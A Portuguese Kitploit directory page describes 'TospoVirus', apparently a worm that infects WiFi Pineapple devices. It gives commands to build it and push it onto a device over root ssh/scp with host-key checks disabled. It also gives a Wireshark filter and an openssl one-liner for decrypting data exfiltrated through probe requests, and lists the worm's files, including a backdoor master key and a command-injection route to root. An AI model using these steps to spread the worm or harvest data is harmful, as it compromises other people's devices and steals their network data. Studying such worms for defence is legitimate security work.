Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
TospoVirus — Um worm que infecta WiFi Pineapple. | Kitploit
Ferramentas/GitHubGitHub/catatonicprime/tospovirus
Mecanismos de PersistênciaExploraçãoMovimento LateralExfiltração de DadosPós-ExploraçãoSegurança Sem FioComando e ControleCavalo de Troia de Acesso Remoto
GitHubcatatonicprime/tospovirus

TospoVirus

Um worm que infecta WiFi Pineapple.

Ver Repositório
1747há 11 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Compilando o TospoVirus para Distribuição:

./build.sh

Distribuir para um pineapple funcional com a versão 2.3:

ssh -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null [email protected] "mkdir /tospo"
scp -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null dist/tv* [email protected]:/tospo/
Nota: Você precisará ter um dispositivo configurado OU usar o módulo metasploit para habilitar ssh

Descriptografando dados exfiltrados:

o filtro do wireshark é:
(wlan.fc.type_subtype == 0x04) && (wlan_mgt.tag.length == 32)
printf $(echo "[data copied from wireshark]" | sed -re 's/(..)/\\x\1/g') | openssl rsautl -decrypt -inkey tvd.pem

Opcionalmente, use o script harvest.py da seguinte forma:
python harvest.py [monitor-iface]

Arquivos & Finalidade:

Baixar ferramenta
ArquivoFinalidade
tvO próprio vírus.
tvbdA chave de backdoor "mestre"; não distribua a chave privada.
tvdA chave de divulgação, usada para exfiltrar dados via requisições de sonda (probe requests).
tospo_rsaA chave privada de identidade, específica de cada dispositivo infectado, usada como chave de transferência.
tospo_rsa.pubA chave pública de identidade, transferida via página de injeção de comandos para permitir que a identidade privada execute ações como root no dispositivo remoto.
wOpções de configuração sem fio enviadas, usadas para restaurar conexões anteriores.
nOpções de configuração de rede enviadas, usadas para restaurar conexões anteriores.
Nota: Todos os arquivos que começam com 'tv' são transferidos ao infectar um novo dispositivo. Não adicione chaves privadas ou similares usando nomes que comecem com 'tv'; caso contrário, sua chave privada será exposta à análise forense.